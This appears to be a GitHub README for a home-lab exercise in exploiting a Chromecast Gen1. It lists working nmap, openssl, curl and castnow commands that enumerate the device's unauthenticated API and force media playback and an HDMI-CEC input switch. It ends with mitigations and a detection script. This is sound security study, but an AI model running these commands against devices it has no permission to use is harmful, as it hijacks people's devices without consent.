Nick-Robb/Chromecast-IoT-Exploit
Chromecast Gen1 IoT Exploitation Lab

This project demonstrates the discovery, enumeration, and exploitation of a vulnerable IoT device (Google Chromecast Gen1) in a home lab environment. The testing was performed with full authorization on a personal network to simulate real-world conditions.


βš™οΈ Objective

  • Identify a vulnerable IoT device on a local network
  • Enumerate available services and protocols
  • Exploit unauthenticated APIs to control device behavior
  • Validate the risk with minimal tooling and no password access

πŸ” Summary

During a routine scan of a trusted home network, an old Chromecast Gen1 was discovered with multiple insecure configurations. Using only Nmap, curl, and castnow, the device was remotely controlled without any authentication, including forcing media playback and switching the TV input via HDMI-CEC.


🧰 Tools Used

| Tool    | Purpose                            |
|---------|------------------------------------|
| Nmap    | Port scanning and SSL enumeration  |
| OpenVAS | Vulnerability scanning             |
| Curl    | Manual API interrogation           |
| Castnow | Remote media casting               |
| openssl | TLS version and cipher testing     |

📋 Technical Steps

1. Discovery & Port Scan

nmap -p 8008,8009,8443,9000 --open 192.168.10.0/24

Result: Chromecast found on 192.168.10.79


2. TLS Inspection

nmap -p 8443 --script ssl-enum-ciphers 192.168.10.79
openssl s_client -connect 192.168.10.79:8443 -tls1

Findings:

  • Accepts TLS 1.0 and presents a SHA-1-signed certificate
  • Weak ciphers (rated F)

3. API Enumeration

curl http://192.168.10.79:8008/setup/eureka_info
curl http://192.168.10.79:8008/ssdp/device-desc.xml

Revealed:

  • Device name, model, firmware, public keys
  • API exposed with no authentication

4. Exploitation – Force Media Playback

sudo apt install nodejs npm -y
sudo npm install -g castnow
castnow --address 192.168.10.79 https://www.soundhelix.com/examples/mp3/SoundHelix-Song-1.mp3

Result:

  • Chromecast accepted the command
  • TV input switched via HDMI-CEC
  • Playback began without user consent

5. Stop Playback

castnow --address 192.168.10.79 --quit
curl -X DELETE http://192.168.10.79:8008/apps/YouTube

πŸ›‘οΈ Key Takeaways

  • Many legacy IoT devices still expose unauthenticated APIs
  • Old TLS versions and SHA1 certificates remain in active use
  • HDMI-CEC can be abused to switch inputs and seize control
  • Simple, publicly available tools can compromise consumer-grade devices without brute force or phishing

🧠 Lessons Learned

  • Vulnerability scanning is only the start; real-world validation matters
  • IoT devices are often the softest target in any network
  • Full control can be achieved with minimal noise or credentials

📛 Mitigation

  • Remove or isolate legacy devices like Chromecast Gen1
  • Segment IoT networks using VLANs or guest Wi-Fi
  • Disable HDMI-CEC if not needed
  • Monitor for unexpected LAN device behavior
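A small detection check for the last bullet, added here as an example and not part of the original lab: it reads flow-log lines and flags any LAN host, other than an allowlisted caster, that reaches the Chromecast's ports 8008, 8009 or 8443 seen in the scan above. The log format, the allowlist and the sample lines are assumptions constructed for this example; only the device address comes from the write-up.

```python
"""Flag LAN hosts that talk to the Chromecast's unauthenticated control ports.

Assumed (constructed) flow-log format, one record per line:
    <timestamp> <src_ip> <dst_ip> <dst_port> <proto>
"""
from collections import defaultdict

# Ports from the discovery scan: DIAL/setup HTTP, Cast v2 TLS, HTTPS setup.
CAST_PORTS = {8008, 8009, 8443}
CHROMECAST_IP = "192.168.10.79"          # the device found in the write-up
ALLOWED_CASTERS = {"192.168.10.20"}      # constructed: the one phone expected to cast

# Constructed sample log: an expected caster, an unexpected host probing the
# device, unrelated DNS traffic and a malformed line that must be skipped.
SAMPLE_FLOWS = """\
2024-05-01T20:01:02 192.168.10.20 192.168.10.79 8009 tcp
2024-05-01T20:01:05 192.168.10.20 192.168.10.79 8008 tcp
2024-05-01T20:03:10 192.168.10.55 192.168.10.79 8008 tcp
2024-05-01T20:03:11 192.168.10.55 192.168.10.79 8443 tcp
2024-05-01T20:03:12 192.168.10.55 192.168.10.79 8009 tcp
2024-05-01T20:04:00 192.168.10.55 192.168.10.1 53 udp
malformed line
"""


def parse_flow(line):
    """Parse one log record; return None for anything that does not fit the format."""
    parts = line.split()
    if len(parts) != 5:
        return None
    ts, src, dst, port, proto = parts
    try:
        port = int(port)
    except ValueError:
        return None
    return {"ts": ts, "src": src, "dst": dst, "port": port, "proto": proto}


def find_unexpected_casters(log_text, device_ip=CHROMECAST_IP, allowed=ALLOWED_CASTERS):
    """Return {src_ip: sorted cast ports reached} for sources not on the allowlist."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        flow = parse_flow(line)
        if flow is None or flow["dst"] != device_ip or flow["port"] not in CAST_PORTS:
            continue
        if flow["src"] in allowed:
            continue                     # expected caster, not an alert
        hits[flow["src"]].add(flow["port"])
    return {src: sorted(ports) for src, ports in hits.items()}


if __name__ == "__main__":
    for src, ports in find_unexpected_casters(SAMPLE_FLOWS).items():
        print(f"ALERT: {src} reached Chromecast control ports {ports}")
```

In a real deployment the same check runs over router, firewall or NetFlow exports for the IoT VLAN; any hit is a host that should not be able to reach the device at all once segmentation is in place.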